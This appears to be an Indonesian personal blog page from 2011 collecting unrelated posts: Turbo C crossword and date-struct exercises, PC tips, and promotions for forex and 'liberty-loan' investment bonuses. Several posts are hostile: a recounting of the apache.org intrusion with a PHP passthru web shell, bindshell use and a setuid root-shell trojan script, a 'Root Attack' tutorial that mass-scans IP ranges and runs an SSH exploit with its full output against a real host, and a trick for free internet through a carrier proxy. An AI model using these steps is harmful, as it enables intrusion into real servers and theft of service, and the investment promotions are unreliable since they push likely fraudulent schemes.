TTS ver2

Diposting oleh Rini Pujiati on Rabu, 26 Oktober 2011

char tts[5][13]={"AIR MINUMAN D",
" N K A A UVO",
"ADIL BIASA IA",
" A EPIK AS S ",
" HADIR AKIBAT"};


int angka[5][13]={1, 2, 0, 0, 3, 0, 4, 0, 5, 0, 6, 0, 7,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 9, 0,
10, 0, 0, 11,0, 12,0, 0, 0, 13,0, 14, 0,
0, 0, 0, 15,16,0 ,0, 0, 17, 0,0, 0, 0,
0,18, 0, 0,0 ,0 ,0, 19,0 , 0,0, 0, 0};

char jawab[5][13]={" * * ",
"* ** * * * ",
" * * ",
"* * * * *",
"* * "};

main()
{ int a,b,brs,klm,tekan,bb=13,kk=20,bekb,bekk,posx=2,posy=5,bekposx,bekposy;
int benar=0,salah=0;
clrscr();
gotoxy(5,2);printf("APLIKASI PERMAINAN TEKA-TEKI SILANG");
gotoxy(1,22);printf("Cara Bermain : Pilih Kotak, Tekan Enter...");
gotoxy(1,23);printf(" Kemudian Isi Huruf KAPITAL!");
gotoxy(1,24);printf("Dibuat Oleh : feriag@yahoo.com");
area();
do
{
textcolor(15);
gotoxy(kk,bb);cprintf("%c",219);
bekb=bb;bekk=kk;
bekposx=posx; bekposy=posy;
tekan=getch();
if(tekan==75) {kk=kk-3;posy--;}
if(tekan==77) {kk=kk+3;posy++;}
if(tekan==72) {bb=bb-3;posx--;}
if(tekan==80) {bb=bb+3;posx++;}
if(tekan==13)
{ menjawab(bb,kk,posx,posy);
ctkjawab();
}
if((tts[posx][posy]==' ') || (posx<0) || (posx>4) || (posy<0) || (posy>12))
{
posx=bekposx; posy=bekposy; bb=bekb; kk=bekk;
}
gotoxy(bekk,bekb);printf(" ");


}
while(tekan!=27);
b=40;
for(a=0;a<=40;a++)
{
for(brs=1;brs<25;brs++)
{
gotoxy(b-a,brs);printf(" ");
gotoxy(b+a,brs);printf(" ");
}
delay(5000);
}
for(a=0;a<5;a++)
{
for(b=0;b<13;b++)
{
if(jawab[a][b]==tts[a][b]) benar++;
else salah++;
}
}
gotoxy(5,5);printf("Hasil Rekapitulasi Jawaban");
gotoxy(5,7);printf("Jumlah Isian Benar : %d", benar);
gotoxy(5,8);printf("Jumlah Isian Salah : %d", salah-17);
gotoxy(5,9);printf("Jumlah Kotak diarsir : %d", 17);

getch();
}









area()
{
int x,y,brs,klm;
for(x=3;x<45;x=x+3)
{ for(y=6;y<20;y++)
{gotoxy(x,y);printf("|");
}
}
for(x=5;x<23;x=x+3)
{
for(y=3;y<=42;y++)
{
gotoxy(y,x);printf("-");
}
}


brs=3;
for(x=0;x<5;x++)
{
brs=brs+3;
klm=4;
for(y=0;y<13;y++)
{
if(angka[x][y]!=0)
{
gotoxy(klm,brs);printf("%d",angka[x][y]);
}
klm=klm+3;
}
}

brs=3;
for(x=0;x<5;x++)
{
brs=brs+3;
klm=4;
for(y=0;y<13;y++)
{
if(tts[x][y]==' ')
{
gotoxy(klm,brs);printf("%c",177);
gotoxy(klm+1,brs);printf("%c",177);
gotoxy(klm,brs+1);printf("%c",177);
gotoxy(klm+1,brs+1);printf("%c",177);
}
klm=klm+3;
}
}

gotoxy(45,1);printf("MENDATAR");
gotoxy(45,2);printf("1. Water (Bhs. indonesia)");
gotoxy(45,3);printf("3. Softdrink adalah Jenis ...");
gotoxy(45,4);printf("8. Piring Terbang");
gotoxy(45,5);printf("10. Sesuai peruntukannya");
gotoxy(45,6);printf("12.Tidak hebat");
gotoxy(45,7);printf("13.Kata ganti orang kedua");
gotoxy(45,8);printf("15.Kisah kepahlawanan");
gotoxy(45,9);printf("17.Negara Adikuasa");
gotoxy(45,10);printf("18.Ada");
gotoxy(45,11);printf("19.Ada Sebab ada ...");

gotoxy(45,13);printf("MENURUN");
gotoxy(45,14);printf("2. Sedap dipandang mata");
gotoxy(45,15);printf("3. Mahkamah Konstitusi");
gotoxy(45,16);printf("4. Tidak Turun");
gotoxy(45,17);printf("5. Matang");
gotoxy(45,18);printf("6. Organisasi Islam");
gotoxy(45,19);printf("7. Harap");
gotoxy(45,20);printf("9. Surat ijin tinggal dinegara lain");
gotoxy(45,21);printf("11.Lampu Elektronika yg kecil");
gotoxy(45,22);printf("12.Jenis Minuman keras");
gotoxy(45,23);printf("13.Air Susu Ibu");
gotoxy(45,24);printf("16.Perhimpunan Indonesia");



}

ctkjawab()
{
int brs,x,y,klm;
brs=4;
for(x=0;x<5;x++)
{
brs=brs+3;
klm=4;
for(y=0;y<13;y++)
{
if(jawab[x][y]!='*')
{gotoxy(klm,brs);printf("%c",jawab[x][y]);}
klm=klm+3;
}
}
}

menjawab(int b, int k,int px, int py)
{
char jwb;
textcolor(0);
gotoxy(5,21);printf("Silahkan Ketik Satu Huruf Jawaban...");
gotoxy(k,b);cprintf(" ");
gotoxy(k-1,b);jwb=getch();
jawab[px][py]=jwb;
gotoxy(5,21
);printf(" ");
}
More aboutTTS ver2

TTS

Diposting oleh Rini Pujiati on Senin, 24 Oktober 2011

char tts[7][8]={"MALAKA P", /*"AIR MINUMAN D",*/
"A E A R", /*" N K A A UVO",*/
"K L RASA", /*"ADIL BIASA IA",*/
"ANEKA B", /* " A EPIK AS S ", */
"N N U", /*" HADIR AKIBAT" */
" PUNGLI ",
" N "};
int angka[7][8]={ 1, 0, 2, 0, 3, 0, 0, 4, /*1, 2, 0, 0, 3, 0, 4, 0, 5, 0, 6, 0, 7,*/
0, 0, 0, 0, 0, 0, 0, 0, /* 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0,*/
0, 0, 0, 0, 5, 0, 0, 0, /*9, 0, 0, 10,0, 11,0, 0, 0, 12,0, 0, 0, */
6, 0, 0, 0, 0, 0, 0, 0, /*0, 0, 0, 13,14,0 ,0, 0, 15, 0,0, 0, 0, */
0, 0, 0, 0, 0, 0, 0, 0, /*0,16, 0, 0,0 ,0 ,0, 17,0 , 0,0, 0, 0};*/
0, 7, 8, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0};


char jawab[7][8];
int nilai=0;


main()
{ int a,b,brs,klm;
clrscr();

pertanyaan();
area();

/* kunci

brs=1;
for(a=0;a<7;a++)
{
brs=brs+3;
klm=5;
for(b=0;b<8;b++)
{
if(tts[a][b]==' ')
{
gotoxy(klm,brs);printf("%c",177);
} else
{
gotoxy(klm,brs);printf("%c", tts[a][b]);
} klm=klm+3; } } */
}
area()
{
int x,y,brs,klm,tombol;
char huruf;

for(x=3;x<28;x=x+3)
{
for(y=3;y<23;y++)
{
gotoxy(x,y);printf("|");
}
}
for(x=2;x<26;x=x+3)
{
for(y=3;y<=27;y++)
{
gotoxy(y,x);printf("-");
}
}
brs=0;
for(x=0;x<7;x++)
{
brs=brs+3;
klm=4;
for(y=0;y<8;y++)
{
if(angka[x][y]!=0)
{
gotoxy(klm,brs);printf("%d",angka[x][y]);
}
klm=klm+3;
}
}
brs=0;
for(x=0;x<7;x++)
{
brs=brs+3;
klm=4;
for(y=0;y<8;y++)
{
if(tts[x][y]==' ')
{
gotoxy(klm,brs);printf("%c",177);
gotoxy(klm+1,brs);printf("%c",177);
gotoxy(klm,brs+1);printf("%c",177);
gotoxy(klm+1,brs+1);printf("%c",177);
}
klm=klm+3;
}
}
brs=16;
klm=16;
gotoxy(brs,klm);printf("o");
do {
tombol=getch();
gotoxy(50,24);
printf("kode tombol : %d ", tombol);
gotoxy(klm,brs);printf(" ");
if(tombol==75) /*panah kiri*/
{
klm=klm-3;
if(tts[x][y]==' ')
{
klm=klm+3;
}
}
if(tombol==77) /*panah kanan*/
{
klm=klm+3;
if(tts[x][y]==' ')
{
klm=klm-3;
}
}
if(tombol==72) /*panah atas*/
{
brs=brs-3;
if(tts[x][y]==' ')
{
brs=brs+3;
}
}
if(tombol==80) /*panah bawah*/
{
brs=brs+3;
if(tts[x][y]==' ')
{
brs=brs-3;
}
if(brs==20)
{
brs=brs;
}
}
if(tombol==13) /*Enter*/
{
gotoxy(klm+1,brs);scanf("%s", &huruf);
jawab[x][y]=huruf;
if(strcmp(tts[x][y],jawab[x][y]))
{
nilai=nilai+5;
gotoxy(40,20);printf("Nilai : %d \n", nilai);
gotoxy(5,25);printf("Jawaban Benar");
} else
{
nilai=nilai-2;
gotoxy(40,20);printf("Nilai : %d \n", nilai);
gotoxy(5,25);printf("jawaban baris ke %d kolom %d salah \n", brs,klm);
}
}
if(klm<3) klm=4; if(klm>27) klm=27;
if(brs<3) brs=4; if(brs>23) brs=21;
gotoxy(klm,brs);printf("o");
}

while((tombol!=27)||(nilai<0)); /*27=escape*/

}



pertanyaan()
{
gotoxy(40,3);printf("MENDATAR");
gotoxy(40,5);printf("1. Malaysia");
gotoxy(40,6);printf("5. Pahit, Kecut, Manis");
gotoxy(40,7);printf("6. Beragam Jenis ");
gotoxy(40,8);printf("7. Pungutan Liar ");
gotoxy(40,10);printf("MENURUN");
gotoxy(40,11);printf("1. Kebutuhan Primer Semua");
gotoxy(40,12);printf(" Makhluk Hidup");
gotoxy(40,13);printf("2. Jenis ikan Air Tawar");
gotoxy(40,14);printf("3. Jenis Tumbuhan yang Hidup");
gotoxy(40,15);printf(" di laut");
gotoxy(40,16);printf("4. Sebutan untuk Raja di Jawa ");
gotoxy(40,17);printf("8. Ujian Nasional");
gotoxy(40,18);printf("Nb : Diisi dgn Huruf Kapital");
gotoxy(40,20);printf("Nilai : 0 \n");

}
More aboutTTS

internet gratis

Diposting oleh Rini Pujiati on Senin, 10 Oktober 2011

yg perlu lu siapin :
1. sebuah kartu A**S 'gsm yg baik' yg pulsanya udah dibawah 1000 ato yg masa tenggang jg gpp
2. install aplikasi proxifier
3. install aplikasi UltraSurf
** point 2 n 3 lu bisa cari di google ato disini atao bisa juga disono

lalu:
1. koneksikan PC ma HP lu kayak biasanya (pake kartu A**S tentunya)
2. lalu dial-up, ntah pake PC Suite ato apa aja terserah

kemudian (Proxifier):
1. setelah konek ke i-net buka Proxifier
2. masuk ke proxy setting (gambar palu) --> Add
3. address isi dgn 10.8.3.8
4. port isi dgn 8080
5. centang HTTPS
6. centang use autentication lalu isi username = AXIS password = 123456
7. klik OK dan klik OK lagi
8. masuk ke proxification rules (sebelah kanan proxy setting)
9. centang Process All except the following
10. klik Add
11. Rule Name = Loopback
12. Applications = ALL
13. IP Ranges = 127.0.0.1
14. Port range = ALL
15. klik OK lalu OK lagi
16. masuk ke Name resolution (sebelah kanan proxification rules)
17. centang Remotely lalu klik OK
setting Proxifier sudah slese

Sekarang (UltraSurf):
1. Klik Option lalu Proxy setting
2. centang Auto-Detect Proxy dan Skip this dialog box on start
3. lalu klik OK dan OK lagi
setting UltraSurf sudah slese

setelah itu seting browser, lu bisa pake opera ato firefox
Firefox
1. Tools --> Options
2. Advanced --> Network --> setting
3. centang manual proxy configuration
4. HTTP Proxy = 127.0.0.1 Port = 9666
5. centang juga use proxy......
6. klik OK dan OK lagi
kalo lu pake opera kurang lebih sama, intinya cari aja di menu seting n proxy ganti dgn parameter diatas

akhirnya :
tutup semuanya : Proxifier, Ultrasurf, firefox lu
lalu buka lagi Proxifier lalu Ultrasurf (tunggu sampe Successfully......) baru buka firefox

trik ini cucok buat browsing aja mengingat koneksinya yg putus2, (kalo putus lu tutup aja ultrasurf n buka lagi, tunggu sampe Successfully...... n gt seterusnya)
kalo lu pengen donlot pake aja aplikasi downloader
More aboutinternet gratis

cara mempercepat windows xp

Diposting oleh Rini Pujiati

malam sambil ngantuk" ane mau share tentang bagaimana cara mengoptimalkan kinerja windows xp ala saya sendiri,
pertama setting pada registri

1. tekan windows + r , kalo gak klik start --> run
2. ketikan regedit
3. kmu dian cari HKEY_CURRENT_USER\Control Panel\desktop
4. cari HungAppTimeout rubah valuenya menjadi 1000
5. cari WaitToKillAppTimeout ubah valuenya menjadi 1000
6. cari AutoEndTasks ubah valuenya menjadi 1
7 kemudian beralih ke HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
8. rubah WaitToKillServiceTimeout valuenya menjadi 1000
udah deh ,

kemudia pake ccleaner , kalo gak punya download dulu softwarenya
dengan ccleaner matikan startup yg tidak di butuhkan ,
kalo sudah semua kemudian restart komputer ,
More aboutcara mempercepat windows xp

How To Deface APACHE

Diposting oleh Rini Pujiati on Sabtu, 08 Oktober 2011

/*
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to :)

/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.

Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.

We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.

We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldnt stand the urge to put that
small logo on it.

/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the laters apache httpserver to diff it the with
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.

So we wrote a little wuh.php3 including
passthru($cmd);
?>

and uploaded that to one of the world writable directories.


/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like

http://www.apache.org/thatdir/wuh.php3?cmd=id

Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd


/*
* The shell
*/
Ofcourse we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:

Now we telnet to port 65533 where we binded that shell and we have local
nobody access, because cgi is running as user nobody.


/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs

apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.


/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has it
username/password plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.

We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.


/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs where
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".

Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.

But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.


/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc


/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was build.
Shortly after the deface, we sent this report to one of the admins.


/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.


/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?


/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FFULL RIGHTS login without a password.


/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).
More aboutHow To Deface APACHE

Root Attack

Diposting oleh Rini Pujiati

lebih lanjut...
1. download scanning http://xvak-1.150m.com/tool/grabbb-0.1.0.tar.gz
2. tar -zxvf grabbb-0.1.0.tar.gz dan make , maka akan kmu dapati file grabbb.
3. cara penggunaan grabbb :
a. ketik ./grabbb maka akan ada help nya
b. klo saya biasanya ./grabbb -a xxx.xxx.xxx.0 -b xxx.xxx.xxx.255 port <== port disini
terserah kmu mau berapa, bisa 21, 22, 23, 443, 80, 8080
- klo kita scan port 21 maka akan keliatan versi wuftpd
- klo kita scan port 22 maka akan keliatan versi ssh
- klo kita scan port 443 maka akan keliatan versi openssl

berikut contoh ssh:
66.1.198.210:22: SSH-1.99-OpenSSH_2.5.2p2
66.1.205.138:22: SSH-1.99-OpenSSH_2.9p2
66.1.213.59:22: SSH-1.5-1.2.27
66.1.214.123:22: SSH-1.99-OpenSSH_2.9p2
66.1.217.77:22: SSH-1.5-1.2.25

setelah kita tau ssh yang dipake, tinggal menjalankan exploitnya

4. download x2, x3, x4 dst tergantung kmu mau pake yang mana, pake semua juga bisa
sebagai contoh pemakaian saya pake x3.tar.gz
5. ./x3 -t 0
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Targets:
( 1) Small - SSH-1.5-1.2.26
( 2) Small - SSH-1.5-OpenSSH-1.2.3
( 3) Small - SSH-1.5-1.2.31
( 4) Small - SSH-1.5-1.3.07
( 5) Small - SSH-1.99-OpenSSH_2.1.1
( 6) Small - SSH-1.5-1.3.6_F-SECURE_SSH
( 7) Small - SSH-1.5-1.2.27
( 8) Small - SSH-1.99-OpenSSH_2.2.0p1
( 9) Big - SSH-1.99-OpenSSH_2.2.0p1
(10) Big - SSH-1.5-1.2.27
(11) Small - SSH-1.99-OpenSSH_2.2.0p1 -TEST
(12) Big - SSH-1.5-1.2.27

6. klo kita liat hasil dari grabbb, maka kita mendapat satu ip yaitu
66.1.213.59:22: SSH-1.5-1.2.27

7. kita coba ./x3 -t 7 66.1.213.59 22 .
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Target: Small - SSH-1.99-OpenSSH_2.2.0p1

Attacking: 66.1.213.59:22
Testing if remote sshd is vulnerable # ATTACH NOW

YES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED #
(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SURVIVED #
(9 ) binary-search: h: 0x083fadfc, slider: 0x00000200 # SEGV #
(10) binary-search: h: 0x083facfc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083fac7c, slider: 0x00000080 # SURVIVED #
(12) binary-search: h: 0x083facbc, slider: 0x00000040 # SURVIVED #
(13) binary-search: h: 0x083facdc, slider: 0x00000020 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083facdc # SURVIVED #
Exact match found at: 0x00005324
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080c5324 # SEGV #
(18) Trying: 0x080c6324 # SEGV #
(19) Trying: 0x080c7324 # SEGV #
(20) Trying: 0x080c8324 # SEGV #
(21) Trying: 0x0810e324 # SURVIVED #
(22 Trying: 0x08088634 # OK #
Finding distance till stack buffer

Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807


********* YOU ARE IN *********

uname -a ; id
uname -a ; id
Linux chander.com.tw 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown
uid=48(root) gid=48(root) groups=48(root)

nah itu uah dapat, terserah mau diapakan

keterangan:
ngeroot menggunakan exploit ini sangatlah memakan waktu, saya menyarankan utk memakai scan massal, bisa memakai massplo.tar.gz atau massrooter.tar.gz sama saja.

tapi yang terpenting disini kita tau bagaimana cara mencari dia memakai ssh versi berapa, wuftp versi berapa, dan yang lain-lain
More aboutRoot Attack

Struktur Data ADT

Diposting oleh Rini Pujiati on Kamis, 06 Oktober 2011

kalo belum ada turbo C silahkan download di sini

File materi kamis siang silahkan download disini

- procedure n Function
- ADT
type data bentukan
type data yang dibentuk oleh programmer sendiri...
----------------------------------------------------------------
Hierarchy Data :
- Huruf / Bit, byte
- Variabel / Field : kumpulan huruf/angka
- Record / Struktur : kumpulan variabel
- File / Table
- Database
- Super Database
-

----------------------------------------------------------------

contoh :
a. Tanggal
b. Waktu
c. pixel

-----------------------------------------------------------------
struct tanggal
{
int tgl, bln, thn;
};



main()
{
struct tanggal now;

clrscr();

now.tgl = 31;
now.bln = 12;
now.thn = 2011;

printf("\n Sekarang : ");tampil(now);
printf("\n Besok : ");tomorrow(now);
printf("\n Kemarin : ");yesterday(now);
printf("\n N day after now ");
printf("\n N day Before Now");


getch();
}


int maks_hari(int bulane, int tahune)
{
if ((bulane==1) || (bulane==3) || (bulane==5) || (bulane==7) || (bulane==8) || (bulane==10) || (bulane==12))
return 31;
else
if((bulane==2) && ((tahune % 4) !=0))
return 28;
else
if((bulane==2) && ((tahune % 4) == 0))
return 29;
else
return 30;
}



tomorrow(struct tanggal y)
{
int tgl_akhir;

tgl_akhir=maks_hari(y.bln, y.thn);

if(y.tgl == tgl_akhir)
{
if(y.bln==12)
{
y.tgl=1;
y.bln=1;
y.thn++;
}
else
{
y.tgl=1;
y.bln++;
}
}
else
{
y.tgl++;
}

tampil(y);
}




tampil(struct tanggal x)
{
switch(x.bln)
{ case 1 : printf("%d Januari %d", x.tgl, x.thn);break;
case 2 : printf("%d Februari %d", x.tgl, x.thn);break;
case 3 : printf("%d Maret %d", x.tgl, x.thn);break;
case 4 : printf("%d April %d", x.tgl, x.thn);break;
case 5 : printf("%d Mei %d", x.tgl, x.thn);break;
case 6 : printf("%d Juni %d", x.tgl, x.thn);break;
case 7 : printf("%d Juli %d", x.tgl, x.thn);break;
case 8 : printf("%d Agustus %d", x.tgl, x.thn);break;
case 9 : printf("%d September %d", x.tgl, x.thn);break;
case 10 : printf("%d Oktober %d", x.tgl, x.thn);break;
case 11 : printf("%d Nopember %d", x.tgl, x.thn);break;
case 12 : printf("%d Desember %d", x.tgl, x.thn);break;
}
}
More aboutStruktur Data ADT

TradeFort $5 Welcome Bonus

Diposting oleh Rini Pujiati on Senin, 03 Oktober 2011

Its the first Forex bonus for September 2011 and i hope you enjoy it.

Today s’ bonus is by this new broker which called TradeFort, they are offering $5 as free welcome bonus to all new clients.

About TradeFort :

TradeFort trademark was founded in 2010 by the team of professionals possessing a long lasting and thorough experience in the international financial services, financial broking services for private and corporate customers and in financial software development.
The trademark is owned by the international financial holding One Vector Group Inc. registered under the legislation of Saint Vincent and the Grenadines being a full-fledged member of the British Commonwealth.

Bonus Conditions:

  1. To get the bonus sign up and you must verify your account. from my experience, my documents and mobile number are verified in less than 2 hours and bonus is deposited into account instantly just by clicking “Get welcome bonus”
  2. Bonus is only available for the first 10 days starting from the date of accountregistration.
  3. Bonus is credited only one time (to new customers only) and only to one account.

Withdrawing Conditions :

  1. To withdraw the bonus and profit made with the help of bonus funds you have to meet the terms of the trading turnover on the account: 1.5 lots for USD or EUR accounts or 150 micro lots for Cent accounts.
  2. No commissions will be charged for withdrawal.
  3. If you deposit your own funds to the account, you can withdraw your deposited funds, as well as profits earned with the help of your deposited funds without any restrictions at any time.

Depositing and Withdrawing :

  1. Wire Transfer.
  2. Liberty Reserve.
  3. Web Money.

Hurry up now and create an account to get your bonus from here

sumber redz85.com

sumber

More aboutTradeFort $5 Welcome Bonus

daftar liberty-loan dapet 1$

Diposting oleh Rini Pujiati

yupz , saya akan share bisnis online yg mantep
cara kerjanya sih kayak investasi , tiap hari dpet profit 1%
tp enaknya bisnis ini ketika daftar langsung dapet free 1$ berarti gak usah ngeluarin dwit lagi udah dapet profit 0,01$ tiap hari , lumayan deh buat nabung ,
udah deh buruan join mumpung gratis,
pertama anda harus punya account libertyreserve kalo belum punya silahkan daftar disini deh
okey kalo sudah punya account di liberti reserve langsung aja daftar liberty-loan klik disini
buruan gratis kok
selamat mencoba , semoga sukses
More aboutdaftar liberty-loan dapet 1$